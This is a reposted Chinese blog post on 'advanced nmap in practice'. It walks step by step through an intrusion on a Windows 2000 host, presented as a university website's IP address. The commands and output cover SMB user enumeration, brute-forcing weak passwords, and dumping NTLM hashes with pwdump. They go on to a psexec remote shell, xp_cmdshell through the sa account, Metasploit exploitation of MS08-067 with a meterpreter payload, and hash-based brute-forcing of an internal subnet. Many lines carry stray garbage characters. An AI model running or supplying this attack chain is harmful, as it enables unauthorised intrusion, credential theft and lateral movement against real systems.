nmap在实战中的高级应用

转的,因为是win2K系统,不太具有代表性。

广西师范网站http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST+ Z)
Nmap scan report for bogon (202.103.242.241);
Host is up (0.00048s latency)
Not shown: 993 closed ports3 ]
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn#
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
3372/tcp open msdtc?
3389/tcp open ms-term-serv?.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r" n;
SF:(GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”))
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO$ ]
SF:ptions,6,”hO\n\x000Z”);
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows;
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本9
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse,
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse1
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse6
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse;
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse:
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse8
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse2
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse,
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
//此乃使用脚本扫描远程机器所存在的账户名
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)4 q$ S1 F2 N- M
Host is up (0.00038s latency).8 U8
Not shown: 993 closed ports
PORT STATE SERVICE1
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
//查看共享
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)$ O)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS5
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
//获取用户密码
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.2418)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE3
135/tcp open msrpc'
139/tcp open netbios-ssn
445/tcp open microsoft-ds7
1025/tcp open NFS-or-IIS9
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:5
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful5 M)
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds;
root@bt:~# wget http://swamp.foofus.net/fizzgig/pwdump/pwdump6-1.7.2-exe-only.tar.bz2//
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT STATE SERVICE4
135/tcp open msrpc9
139/tcp open netbios-ssn.
445/tcp open microsoft-ds
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-pwdump:0
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
-p 123456 -e cmd.exe
PsExec v1.55 – Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals – www.sysinternals.com8
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST4
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports7
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn1
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds6 w3
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi%
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator4 Z5 I5 w0 R9 c
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE3
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
//利用用户名跟获取的hash尝试对整段内网进行登录2
Nmap scan report for 192.168.1.105"
Host is up (0.00088s latency).
Not shown: 993 closed ports9
PORT STATE SERVICE.
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|_ administrator:<blank> => Login was successful(

 

posted @ 2013-05-26 09:08  vigarbuaa  阅读(1377)  评论(0编辑  收藏  举报